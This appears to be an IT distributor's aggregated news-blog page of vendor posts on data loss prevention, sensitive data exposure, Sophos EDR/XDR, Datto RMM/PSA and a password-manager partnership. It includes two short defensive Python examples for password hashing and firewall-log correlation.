The Challenge of Data Protection Efficiency
Many traditional data security solutions end up blocking “safe” data alongside the potentially malicious or harmful data they are meant to stop. These false positive or false negative alerts can quickly spiral out of control, unnecessarily slowing down the flow of business.
These traditional solutions focus on tight control, but at a cost. At some point, the data handcuffs can get too restrictive and the need to share and access easily (and securely) becomes a top priority for productivity. However, protecting data throughout its lifecycle is not a one size fits all process.
Putting an Adaptive Data Loss Protection (A-DLP) solution in place can take organizations beyond the “block everything” mode by going on the defense to detect and prevent unauthorized sharing before any breach occurs. With DLP in place, organizations gain flexibility and can intelligently inspect and sanitize both structured and unstructured (meta) data within emails, files being transferred via web or cloud, and endpoints to ensure the specified security policy is applied automatically.
This flexibility is of particular importance to highly regulated industries and to adhere to data privacy laws such as HIPAA, PCI-DSS, CCPA, GDPR, and more, which specify the level of protection that should surround data at all points in its journey.
The Challenge of Sharing Files Securely and Efficiently
Once data has been classified and sanitized, the challenge of sending it to a third-party or internally must be met. A secure managed file transfer (MFT) solution can rise to the challenge while meeting stringent compliance requirements for end-to-end protection. Automated workflows, as well as auditing and reporting functionality, add increased security and transparency around file transfers large and small. This reduces the human factor risks so often responsible for file transfer errors.
Combining MFT with Adaptive DLP can further ensure that any files sent and received do not contain sensitive data.
The Challenge Remote Work Poses
As organizations reimagine how and where work gets accomplished, a growing number of workers will continue working from wherever is most convenient and at times on their personal devices. While this flexibility is mostly welcomed, it does not come without data security threats. Employees, of course, are among an organization’s most valuable assets, but they also pose some of the biggest risks without education, intelligent technology solutions, and policies and procedures that are easy to follow to ensure data security.
Data is unquestionably more vulnerable with this more flexible work environment and the human factor continues to pose threats. When people are busy, tired, or pressured is when mistakes around securing data tend to be made.
The need to communicate and collaborate securely remains and the risk of exposing sensitive data both within and outside of the organizations grows higher with more user access points and the ad hoc use of non-approved collaboration and file transfer processes.
Organizations need mechanisms that let people work yet have a safety net to protect them (and their employers) from doing the wrong thing data security-wise. With more demand for functionality comes more risk in sharing data with third parties or via the cloud, upping the risk of a data breach or compliance requirement failures.
The Challenge of Managing Multiple Security Solutions
While it’s easy to see that layers of security can help freeze insecure data movement in its tracks, reduce human error risks, and ensure that even hidden sensitive data isn’t inadvertently accessed, managing those layers with multiple vendors can create productivity bottlenecks.
One way to alleviate pressure on IT staff is to work with a single trusted vendor capable of delivering multiple layers of security for operational simplicity. This can help ensure that your data classification, data loss prevention, and managed file transfer tools are well integrated and scalable. If the elements that make up your data security suite are not easy and intuitive to use, it will lose its effectiveness as the last barrier to employees making a data security error.
Facing Data Security Challenges with a Security Suite
A solid security suite is one flexible enough to enforce your security policies, rather than forcing your processes into the solution itself. One benefit of employing a suite-style solution is that it can be implemented in modular fashion. You can deploy a single software solution to address today’s specific data security issue and be comfortable knowing you can add additional layers of security as your needs grow and change. In addition, you can take advantage of solution integrations and enjoy economies of scale.
Data security can encompass any one or a combination of these technologies:
Data Classification: Attaches markings to data to trigger encryption policies. There is no need for a separate encryption job when this is employed.
Data Loss Prevention: Enforces compliance policies with data redaction and sanitization of data as it looks for classification tags and removes risks while letting “safe” data pass through. Over-policing of data typically seen with DLP enforcement can be avoided.
Integrated Email Security: Detects, defends against, and deters phishing, business email compromise, and other advanced identity deception email attacks.
Managed File Transfer: Provides a secure platform to more easily share data with trusted individuals and includes automation, auditing, and reporting functionality.
Digital Rights Management: Adds a security wrapper around data wherever it travels, and lets you control and revoke access as needed after it leaves your organization.
How Can We Help You Meet Your Data Security Challenges?
Every organization has different data security challenges, requiring a customized approach to how security layers are applied. Let us show you how you can face your data security challenges more easily with help from the suite of data security solutions from HelpSystems.
Source: Boldon James
The term sensitive data exposure means letting unauthorized parties access stored or transmitted sensitive information such as credit card numbers or passwords. Most major security breaches worldwide result in some kind of sensitive data exposure.
Exploiting an attack vector such as a web vulnerability is just the first step that the attacker takes. Further steps usually involve one of three goals: stealing sensitive information, planting malicious software (for example, to attack other targets or enable permanent control/spying), or escalating to other systems (where this choice repeats). Obviously, stealing sensitive information such as credit card data is the most profitable goal for the attacker and most cyberattacks are driven by money, hence sensitive data exposure is the most common attack goal.
Just like it is possible to create software with next to no vulnerabilities, it is also possible to create software that prevents the attacker from accessing sensitive information. Sensitive data exposure is caused by bad design or implementation of computer systems and software as well as misconfiguration of such systems and software.
Defining sensitive data
When you build a web application, you must clearly define what you consider to be sensitive data. While some examples are obvious, like credit card numbers, authentication credentials, or health records, others may not seem so straightforward. Even if a piece of information is to be displayed onscreen by the application, it may still be considered sensitive in transit and storage.
Any type of data that can be considered personal data or private data should be considered sensitive. This means even data such as first and last name, date of birth, or even an email address. Criminals are after such data because they can correlate personal information stolen from other sources to create profiles for identity theft.
Any data related to financials should also be considered sensitive and this does not mean just credit card numbers. For example, bank account numbers, both internal and IBAN, should also be considered sensitive as well as any transaction amounts.
Depending on the industry that your business deals in, some data may be not only considered sensitive but also covered by compliance regulations. Make sure that all that data is secured, both in transit and in storage, otherwise you will lose your compliance.
Sensitive data exposure vulnerabilities in transit
Most websites and web applications nowadays are accessible via secure SSL/TLS connections. Many go as far as enforcing such connections using HTTP strict transport security (HSTS). As a result of this, many web application designers think that it’s safe to transmit sensitive information between the client and the server using clear text.
This mindset is the primary cause of sensitive data exposure in transit. Unfortunately, despite the fact that SSL/TLS provides a high degree of protection, there are cases when a man-in-the-middle attack (MITM) on network traffic is possible. If the attacker somehow manages to access data transmitted between the web application and the user, and this data includes, for example, credit card numbers or clear text passwords, the attack ends up in sensitive data exposure.
Therefore, the best way to protect your web application against sensitive data exposure is never to transmit any sensitive data using clear text and always use cryptographic algorithms to secure them. Note that these should not be weak crypto algorithms because the attacker may store the intercepted data and later attempt to break the encryption using powerful GPUs.
Sensitive data exposure vulnerabilities in storage
Storing sensitive data securely is just as important as transmitting it securely, if not more. If an attacker exploits a vulnerability and gains access to your website or web application, for example, using an SQL injection, they may be able to access the content of your entire database. If any sensitive information is stored in the database without encryption, it’s a guaranteed leak.
When storing sensitive information, using renowned, secure, and strong encryption algorithms is even more important than in the case of transit. A weak algorithm will let the attacker quickly run brute force attacks on the stolen encrypted data and decode the original information.
In addition to strong database encryption, some types of sensitive data need extra protection. For example, passwords that are encrypted or hashed using even the strongest algorithms can be easily broken if the password itself is a weak password. Therefore, avoiding common password vulnerabilities is just as important as encryption or hashing.
Sensitive data exposure vulnerabilities in email
It is shocking to see how many businesses and institutions forget that email is not a secure channel and sensitive data should never be transmitted using this medium. Email connections between the client and the server may be encrypted but the connections between servers are usually done using plain text. The email body is not encrypted, either. And the recipient of the email has no control over how securely their email content is stored or whether it is actually destroyed when the email is deleted client-side.
If your web application sends emails, you should never send any sensitive data in emails and, instead, use the web application itself to present or accept sensitive information. For example, you should never ever send a new password via an email and instead display it for the user on a web page. An institution should also never send any personal and sensitive data in clear text over emails, which is, unfortunately, the way that many government institutions do it in many countries.
Protecting sensitive data
Sensitive data is considered important enough by OWASP (the Open Web Application Security Project) to feature it in the OWASP Top 10 as a separate category. In the 2017 edition, this category was considered the third most important common flaw. We also believe that in the upcoming 2021 OWASP Top 10 this category will only gain in importance. Therefore, you should take great care to protect your sensitive information and avoid sensitive data exposure.
Protecting your sensitive data is really easy as long as you use cryptographic algorithms in transit and in storage along with any side-measures such as, for example, proper key management (so that your keys are as safe as the data itself). In some cases, you don’t even need to transmit or store encrypted data, you can use hash algorithms. Password hashing is the most efficient way to make sure that passwords are never stolen, both in transit and in storage.
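The storage guidance above (strong hashing, protection against brute force of stolen records, and rejecting weak passwords) worked through in code. This is an added example, not code from the Acunetix article: it uses the standard-library PBKDF2-HMAC-SHA256 with a per-user random salt, a constant-time comparison on verification, and a small constructed blocklist standing in for a real breached-password list.

```python
"""Storing passwords so that a stolen database does not expose them.

Added example (not from the Acunetix article). A salted, iterated KDF means
each stolen record must be attacked individually and slowly; the blocklist
check means a guessable password does not undo that work.
"""
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000   # cost factor; raise as hardware gets faster
SALT_BYTES = 16

# Constructed sample blocklist for the example; a real deployment would load
# a large list of known-breached passwords.
COMMON_PASSWORDS = frozenset({"password", "123456", "qwerty", "letmein", "welcome1"})


def is_weak_password(password: str, min_length: int = 12) -> bool:
    """True when the password is too short or appears on the blocklist.

    Hashing cannot protect a guessable password: an attacker holding the
    stolen record simply hashes candidates until one matches.
    """
    return len(password) < min_length or password.lower() in COMMON_PASSWORDS


def hash_password(password: str) -> str:
    """Return a self-describing record: algorithm$iterations$salt$digest.

    A fresh random salt per user means identical passwords produce different
    records, so one precomputed table cannot be used against the whole database.
    The iteration count is stored so it can be raised later without breaking
    existing records.
    """
    salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the digest with the stored parameters and compare in constant time."""
    try:
        algorithm, iterations, salt_hex, digest_hex = stored.split("$")
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(digest_hex)
        rounds = int(iterations)
    except ValueError:
        return False          # malformed record: never accept it
    if algorithm != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    # compare_digest avoids leaking how many leading bytes matched via timing
    return hmac.compare_digest(candidate, expected)


def register(password: str) -> str:
    """Registration path: reject weak passwords, otherwise store only the hash."""
    if is_weak_password(password):
        raise ValueError("password is too short or too common")
    return hash_password(password)


if __name__ == "__main__":
    record = register("correct-horse-battery-staple")
    print(record)                                                    # hash only, never the password
    print(verify_password("correct-horse-battery-staple", record))  # True
    print(verify_password("wrong-password", record))                 # False
```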
Source: Acunetix
Read our new report The IT Security Team: 2021 and Beyond to ascertain the full impact of the pandemic on the IT security teams around the globe.
Based on findings of an individual survey of 5,400 professionals across 30 countries, the report reveals how IT security teams’ cybersecurity experiences changed over the course of 2020 and what this means for the future delivery of IT security.
More work, more learning
With technology a key enabler for dispersed and digital organizations, IT professionals played a vital role in helping organizations to keep going despite the restrictions and limitations necessitated by COVID-19.
At the same time, adversaries were quick to take advantage of the opportunities presented by the pandemic: 61% of IT teams overall reported an increase in the number of cyberattacks targeting their organization over the course of 2020.
It’s therefore not surprising that demand on IT teams grew over the course of 2020. 63% of respondents said their team saw an increase in non-security workload, while 69% experienced an increase in IT security workload.
However, the vast majority of IT teams that faced a rise in cyberattacks (82%) and a heavier security workload (84%) over the course of 2020 also strengthened their security skills and knowledge.
Adversity brought teams together
Despite the challenges created by the pandemic, 52% of the IT teams surveyed said team morale increased during 2020, with those facing the greatest challenges often reporting the greatest increase. For instance, ransomware victims were considerably more likely to have experienced an increase in team morale than those that weren’t hit (60% versus 47%).
While morale is also likely influenced by external and personal circumstances during the pandemic, these findings suggest that a shared purpose, a sense of value and facing adversity together helped to bond and lift the spirits of IT teams.
The experiences of 2020 have fuelled ambitions for bigger IT teams
Many teams have entered 2021 with plans to increase the size of both in-house and outsourced IT teams, and to embrace the potential of advanced tools and technologies.
The survey found that 68% of IT teams anticipate an increase in in-house IT security staff by 2023, and 56% expect the number of outsourced IT security staff to grow over the same time frame.
An overwhelming majority (92%) expect AI to help deal with the growing number and/or complexity of threats.
Read the full survey findings
To learn more, including a deep dive into the experiences of different countries and sectors over 2020 and their future IT security delivery plans, read The IT Security Team: 2021 and Beyond survey report.
Source: Sophos
There are many different technologies that drive business for managed service providers (MSPs), but few are more important than professional services automation (PSA) and remote monitoring and management (RMM) tools used to run their core business of delivering IT managed services.
MSPs have a lot on their plate, from managing client relationships, growing sales pipeline, keeping endpoints up to date and secure, and resolving tickets quickly. To grow their business, it’s critical to effectively utilize business management tools like PSA and RMM to drive efficiency, insight, client satisfaction–and ultimately, profitability. So for MSPs, selecting the right vendor for these tools is an important decision.
Canalys MSP Tech Stack Report
Canalys, a third-party analyst firm focused on the MSP channel, recently debuted their annual MSP Tech Stack Report assessing the performance and momentum of global PSA and RMM vendors. Of the 17 vendors analyzed in the report, Datto was given the highest combined Momentum and Performance score, along with placement in the ‘Strategic’ category, indicating a dedication to the development of our solutions and technological capability.
In order to be recognized as a strategic vendor for RMM and PSA, vendors needed to demonstrate strong technological capabilities and illustrate investment and ambition for continued growth. Vendors in this category also needed to display solid work in product development and technological capability, acquisitions to broaden their portfolio, and deliver training to provide MSPs with the skills necessary to help customers with their IT assets.
Driving efficiency and insight through integrated, MSP-centric solutions
Datto has a unique combination of demonstrated performance based on key metrics and strong future opportunities as defined by our technological capabilities, strategy, and open ecosystem. This enables Autotask PSA and Datto RMM to help MSPs deliver efficient, high-quality managed services for the IT environments of today, and prepare for those of tomorrow.
Datto Autotask PSA and RMM are secure, reliable, and intuitive cloud-based platforms designed to help MSPs run their IT managed services business more efficiently. The seamless integration between the two platforms can help elevate MSPs to higher levels of insight, productivity, and profitability with easy navigation between platforms and relevant real-time asset data and actions providing clear insight into your managed estate. This integration enables MSPs to mitigate issues before they occur, shave minutes off each ticket, and unlock new business opportunities.
“We are excited about being ranked as the highest combined scoring vendor in the RMM and PSA space by Canalys,” said Radhesh Menon, Chief Product Officer at Datto. “Being recognized as a ‘strategic’ vendor validates our focus on innovating to help our partners grow their business with secure and easy-to-use platforms that help drive efficiency, actionable insights, and profitability.”
To learn more about the PSA and RMM vendor landscape, download the report today.
Source: Datto
NSS, an international value-added distributor of leading cutting-edge IT solutions, announced its partnership with Password Boss.
Password Boss is an award-winning, complete end-to-end, multi-tenant password management solution for MSPs that securely stores their business’s and their clients’ passwords. The features of this password management solution include multi-layered security, role-based access, secure password sharing, remote control tool integration, multi-device access with mobile synchronization, a centralized management portal and dashboard, built-in Dark Web scanning and monitoring, and much more. This strategic distribution agreement brings Password Boss technology to MSPs in Southeast Europe through NSS.
Founded in 2014, Password Boss was designed and developed to meet the needs and ways that MSPs work and support their customers and it is built to complement all the tools and applications that MSPs use most.
“We are thrilled to add Password Boss to our product portfolio and distribute this amazing password management solution to our partner MSPs,” said George F. Kapaniris, Executive Director, NSS. “We look forward to helping MSPs securely store their businesses’ and clients’ passwords. After all, Password Boss is a password management solution that was built by an MSP for MSPs.”
NSS will distribute Password Boss in the markets of Greece, Cyprus, Malta, and Bulgaria. NSS continues to expand its product portfolio to meet the increasing IT requirements and security needs of businesses and MSPs during this age of digital transformation.
To find out more please visit: https://www.nss.gr/en/products/security/password-boss/
About NSS
NSS is an international Value Added Distributor of Affordable Cutting Edge IT solutions, covering technology areas that include information security, network optimization, communications, and infrastructure systems. NSS has strategic partnerships with superior vendors offering products & services with leading technologies that place the company ahead of the competition in today’s crowded market. NSS products can be acquired through a selected channel of resellers in Greece, Cyprus, Malta, the Balkan and Adriatic Countries.
We are pleased to announce that on May 19, 2021 we released some exciting updates for all customers using Sophos EDR (Endpoint Detection and Response) with Intercept X Advanced with EDR and Intercept X Advanced for Server with EDR.
What’s new?
Introducing the Sophos Data Lake
The Sophos Data Lake stores critical information from your EDR-enabled endpoints and servers, which means you get access to that data even if those devices are currently offline.
In addition to providing key data from devices even when they are not online (for example, a device knocked offline during an attack, or a misplaced laptop), the Sophos Data Lake also enables event correlation on a much broader scale. For instance, you can quickly identify that a suspicious account is logged in across multiple devices.
Then when you have identified an area of interest you can query the device with Live Discover and get incredibly rich, live data and remotely access the device via Live Response to take appropriate action. It’s the best of both worlds.
You get 7 days of retention in the data lake as standard (30 days with Sophos XDR) which is in addition to the existing up to 90 days of data stored directly on devices.
Please note that you need to enable the Sophos Data Lake. In your Sophos Central console select ‘Global Settings’ then under Endpoint or Server Protection (or both) select the ‘Data Lake uploads’ setting and turn on the ‘Upload to the Data Lake’ toggle. From the same window you can also select which devices send data to the Sophos Data Lake.
The Sophos Data Lake is available now for Windows and Linux devices. Mac support will come later this year.
Scheduled queries
One of the top requested features, this release introduces scheduled queries so you can have critical information ready and waiting for you. Queries can be scheduled to run overnight so key data is ready for assessment the next day.
To set up a scheduled query you first need to choose a query by going to the ‘Threat Analysis Center’ and then ‘Live Discover’. When you have selected the query you want to run you will see a new option to schedule the query instead of running it immediately.
When the query has been successfully scheduled it will appear in your ‘Scheduled Queries’ list.

Enhanced usability
Work even faster with enhancements to workflows and pivoting. You’ll get to key information faster and be able to take actions and respond even more quickly.
Sophos XDR
We have also released Sophos XDR (Extended Detection and Response). Sophos XDR goes beyond endpoints and servers, pulling in rich Sophos Firewall and Sophos Email data with more XDR-enabled products coming soon.
Here are just a few Sophos XDR use cases:
| IT Operations | Threat Hunting |
| --- | --- |
| Identify unmanaged, guest, and IoT devices | Extend investigations to 30 days without bringing a device back online |
| Why is the office network connection slow? Which application is causing it? | Use ATP and IPS detections from the firewall to investigate suspect hosts |
| Look back 30 days for unusual activity on a missing or destroyed device | Compare email header information, SHAs, and other IoCs to identify malicious traffic to a domain |
To learn more about Sophos XDR please see this article.
Source: Sophos
Watch the complete online event BEYOND PRODUCTIVITY
A 90-minute crash webinar where you will be presented with the Next Generation RMM, how to Unify People, Processes and Data in a Single Pane of Glass, and how to Protect Data and Keep your Business Running, along with a complete end-to-end, multi-tenant password management solution for MSPs.
One Datto: Drive Revenue With Integrated Solutions
One Datto illustrates how integrated solutions increase efficiency and build MRR. In this video, we show how a fully integrated platform of best-in-class Continuity, SaaS protection, networking, RMM, and PSA solutions combine to streamline a response to a ransomware attack. The integrated platform reduces the number of steps to complete tasks, enabling you to quickly and efficiently return clients to production, grow your MRR with value-added managed services, improve the efficiency of your service delivery, and protect your clients from data loss.
Protect Data and Keep Business Running. Datto Unified Continuity covers all of your business continuity & disaster recovery needs. Protect servers, files, PCs, and SaaS applications. Datto works with MSPs to customize a solution tailored to you and your clients.
Datto enables you to be prosperous and secure with products designed specifically for MSPs. Datto is more than just a technology provider. Datto empowers you to implement and sell solutions that help you grow.
A complete end-to-end password management solution designed and developed by an MSP specifically for the needs and the ways that today’s MSPs work and support their customers.
The Password Boss password management solution brings industry-leading password protection to MSPs for the first time. A perfect fit in your MSP service profile.
Watch the complete online event BEYOND PRODUCTIVITY
A 90-minute crash webinar presenting the Next Generation RMM, how to unify people, processes, and data in a single pane of glass, how to protect data and keep your business running, and a complete end-to-end, multi-tenant password management solution for MSPs.
Watch the event: http://bit.ly/NSS-BEYOND-PRODUCTIVITY
Autotask PSA is designed to drive efficiency, accountability, and the intelligence of managed service providers (MSPs) by unifying people, processes, and data to provide a singular view across their IT managed services business. The latest enhancements to Autotask PSA improve usability and add Document Manager and Knowledgebase features that increase technician accountability.
Additionally, MSPs who have integrated their Autotask PSA with Datto RMM can now click directly from Autotask PSA into a Datto RMM remote takeover session on managed devices that need additional support.
Document Manager and Knowledgebase Enhancements
The past two releases added Document Manager capabilities within Autotask PSA to improve efficiency by providing quick and easy access to standardized documentation so technicians spend less time searching for answers. SSL Certificate and Domain Tracking capabilities were enabled to provide a single location for MSPs to manage and track expiring assets to help ensure they never miss a renewal.
Additionally, the latest Autotask release increases accountability of Document Manager and Knowledgebase users with revision, rollback, and approval features. Quickly identify when updates were made, and quickly select and restore to the desired version. Those with proper credentials can approve documents and Knowledgebase articles prior to publishing.
Account Management Module Modernized
Autotask PSA’s Account Management module, which provides a real-time view of the health of each account and allows sales teams to manage their sales pipeline by creating and tracking opportunities, has been revamped to reflect our new user experience. The intuitive Company pages now feature a configurable and tab-based UI to help improve account manager and sales rep efficiency and will provide a more cohesive experience with the other Autotask PSA modules.
Project Task, Time, and Note Entry Usability Enhancements
In addition to the Account Management pages getting a major facelift, Project Task, Time, and Note Entry have been updated significantly to improve user experience and efficiency. The integrated Time Entry enables users to quickly and accurately enter or edit time with an intuitive timeline view. The new rich text editor for Note Entry improves context and enhances understanding of problems by providing a convenient way to style text (bold, italic, underline), create bulleted and numbered lists, and embed images.
Autotask LiveMobile App Improvements
The Autotask LiveMobile App, which enables remote workers to access the Autotask PSA system even when they are away from their desks, has been enhanced, as well. Beyond just updating the look and feel, the latest updates to the native iOS and Android apps bring the full PSA ticket experience onto a mobile device for improved tech efficiency.
Looking for a PSA platform that helps grow your business by unifying Document Management, Service Desk, CRM, Procurement, Billing, and Reporting behind a single pane of glass? Learn more about Autotask PSA today.
Source: Datto
RMM stands for “remote monitoring and management.” Remote monitoring and management tools are a foundational technology for managed service providers (MSPs). Managing client endpoints and devices is a key tenet of a managed services business, and these tools give MSPs the ability to do so remotely.
What are the benefits of RMM tools?
RMM solutions are used by IT professionals to remotely monitor system status and manage processes without having to be physically on site. With the right RMM tool, MSPs can do more with less, simplifying operations for the MSP while providing efficient service for the client.
Drive Efficiency and Automation into Service Delivery
By centralizing the management of client endpoints, MSPs can reduce costs and increase service delivery efficiency. From installing software to patch management, remote monitoring and management software is designed to drive efficiency, scalability, usability, and affordability.
Scale the Business
For maximum uptime, consider a 100% cloud platform with no hardware to maintain. With a cloud-based RMM solution, MSPs can scale their endpoints with ease, whereas an on-premises solution may require upgrades and manual maintenance to grow with your business.
Build Value and Trust with Clients
With a robust remote monitoring and management solution, MSPs can remotely and proactively monitor and support clients with one-click access to endpoints, mitigating risk and anticipating issues before they occur. MSPs can also use their RMM tool to provide clients with valuable insights and reporting.
Unify With Your Operations Engine
MSPs live and breathe in a professional services automation (PSA) tool to deliver service to clients, manage tickets, and organize business operations. To run an efficient and effective managed services business, PSA and RMM tools are essential. So, it only makes sense that integrating them will save MSPs time from not having to switch from platform to platform to complete a task.
Datto RMM: Built for MSPs
Datto RMM is the platform of choice for thousands of MSPs around the world looking to reduce the operational overhead of delivering managed services.
- Comprehensive auditing: Get complete visibility of every device and pinpoint areas for action.
- Real-time monitoring: Implement system-wide monitoring with intelligent alerting, auto-response, and auto-resolution.
- Flexible reporting: Prove your value and help your customers make decisions with a wide array of reports.
- Built-in patch management: Automatically maintain every device with flexible, native OS and application patch update policies.
- Remote control and takeover: Provide instant support with one-click access to any of your managed devices.
What Makes Datto RMM Different
- Rapid pace of innovation: The Datto RMM product team pushes updates once a month to improve user experience.
- Onboarding and ongoing optimization: Our implementation team is full of pros that specialize in helping MSPs adopt Datto RMM by providing ongoing support that’s unique to their business needs and use cases.
- One price, simple, and affordable: An affordable flat fee per device gives MSPs full visibility, management, and monitoring of every device under contract.
- Performance and security: Datto is 100% cloud-based and built to scale.
- Datto RMM integrations and open ecosystem: Native integrations with Autotask PSA, Datto Networking, and Unified Continuity solutions drive operational efficiency and greater profits for our MSP partners. We’re also committed to an open ecosystem for other MSP tools and technologies.
How to choose the right solution for your MSP business?
Take a look at our eBook, RMM Made MSPeasy, where we’re diving into what you should consider when selecting a solution. Plus, you’ll find advice from industry-leading MSPs on using RMM to increase operational efficiency and drive revenue.
Whether you are just getting started with managed services or are currently evaluating new software, this eBook is for you.
Source: Datto
After the 2020 pandemic tipped our traditional way of work on its head, companies scrambled to support fully remote workers. But as the vaccine roll-out continues, many organizations are welcoming workers back to the office. However, that doesn’t mean all companies are planning to go back to exactly the same way things were before. BeyondTrust covers three focuses for SecOps in the era of remote / hybrid work…
Read more here: https://www.beyondtrust.com/blog/entry/dispatches-from-anywhere-securing-the-next-wave-of-work?utm_source=NSS-NewsBlog&utm_id=NSS-Greece
When we set out to build our extended detection and response (XDR) solution, we focused on a key mantra: if you want the best XDR, you need the best data.
Sophos XDR is driven by data. It delivers the most comprehensive and precise data across multiple dimensions for the most accurate threat detection, investigation, and response. This is achieved thanks to the scope of data, range of sources, and data quality.
Scope of data
Sophos XDR blends 90 days of rich, on-device endpoint and server data with 30 days of cross-product telemetry in our data lake. This provides the broadest and most in-depth, contextualized insights for both live and offline devices.
Why do you need both on-device data and data stored in a data lake? The two types of data complement each other, which is key to stopping stealthy, high-stakes attacks.
On-device data provides a live view of what’s happening right now on your endpoints and servers, plus an incredibly detailed historical record of activities for the last 90 days – far more detailed than a data lake would typically retain.
All key information and events are logged. This includes process information down to the thread level (starting, stopping, parent, child), changes to the registry, programs running, system events, and much, much more.
The data lake provides its own set of advantages, such as the ability to detect incidents by correlating information across your estate.
Crucially, it also allows users to query both online and offline devices – even those which may have been taken offline during an attack. However, data stored in a cloud repository is always historical and does not provide a real-time view.
The two data types work together. The data lake provides the 10,000-foot view and helps correlate events across your estate from both live and offline devices. From there, you can pivot to live running systems and access the industry’s richest on-device data set to see exactly what’s happening right now, or what happened in the last 90 days.
Blending on-device data with the information stored in the data lake ensures you get the broadest scope of data so you don’t miss a thing.
Data sources
Sophos XDR is the first and only XDR solution that synchronizes native endpoint, server, firewall, and email security – with mobile and cloud integrations coming soon.
This broad set of data sources goes well beyond endpoint and server visibility alone. Instead, you get the full picture when detecting and investigating incidents.
For example, you could use firewall data to identify suspicious traffic coming from an unmanaged endpoint or investigate a suspected phishing attack to see if there has been further traffic to a malicious domain.
All the data sources are integrated out of the box when you have Sophos XDR-enabled components. There’s no need to create your own custom infrastructure.
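As an added illustration of the firewall-plus-endpoint correlation described above (example code written for this page, not Sophos's; the log format, the device inventory and the flagged domain are all constructed), a small Python routine flags traffic from source addresses the endpoint inventory does not know about and pulls every connection to a domain under investigation:

```python
"""Correlate firewall telemetry with an endpoint inventory.

Added example, not Sophos code. The key=value log format, the managed-host
inventory and the flagged domain are constructed for the demonstration.
"""

# Constructed inventory: addresses where an endpoint agent is installed.
MANAGED_HOSTS = {"10.0.1.10": "WS-FINANCE-01", "10.0.1.11": "WS-HR-02"}

# Constructed: a domain flagged during a suspected-phishing investigation.
FLAGGED_DOMAINS = {"login-verify.example.net"}

# Constructed firewall log lines (hypothetical key=value format).
FIREWALL_LOG = """\
ts=2021-06-01T09:00:01Z src=10.0.1.10 dst=93.184.216.34 fqdn=example.org action=allow
ts=2021-06-01T09:00:07Z src=10.0.1.42 dst=198.51.100.9 fqdn=update.example.com action=allow
ts=2021-06-01T09:01:12Z src=10.0.1.11 dst=203.0.113.5 fqdn=login-verify.example.net action=allow
ts=2021-06-01T09:01:30Z src=10.0.1.42 dst=203.0.113.5 fqdn=login-verify.example.net action=block
"""


def parse_line(line):
    """Split one 'k=v k=v ...' record into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def correlate(log, managed, flagged):
    """Return (unmanaged_sources, flagged_connections).

    unmanaged_sources maps each source IP absent from the inventory to the
    domains it contacted; flagged_connections lists every event whose fqdn
    is under investigation, annotated with the managed hostname if known.
    """
    unmanaged, followups = {}, []
    for raw in log.splitlines():
        ev = parse_line(raw)
        host = managed.get(ev["src"])
        if host is None:
            unmanaged.setdefault(ev["src"], []).append(ev["fqdn"])
        if ev["fqdn"] in flagged:
            followups.append({"ts": ev["ts"], "src": ev["src"],
                              "host": host or "UNMANAGED", "action": ev["action"]})
    return unmanaged, followups


if __name__ == "__main__":
    unmanaged_hosts, flagged_hits = correlate(FIREWALL_LOG, MANAGED_HOSTS, FLAGGED_DOMAINS)
    print("unmanaged sources:", unmanaged_hosts)
    print("flagged connections:", flagged_hits)
```

The managed hit (WS-HR-02, allowed) is where an analyst would pivot to the on-device record; the unmanaged source shows traffic no endpoint agent could have reported.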
Quality of data
When conducting threat detection and response, having a lot of data is only part of the equation.
Because huge volumes of data can be overwhelming, you instead need high-quality data.
Sophos XDR has more high-quality data, which means we deliver stronger signals and less noise for better detection. This is because Sophos XDR is built on top of Intercept X, the world’s best endpoint protection.
Intercept X filters out a lot of the noise that ends up causing alert fatigue for analysts, allowing them to help focus on what’s truly important.
To further improve data quality, Sophos XDR provides additional context to put the data into perspective. This includes additional intelligence from SophosLabs and the Sophos AI team.
Source: Sophos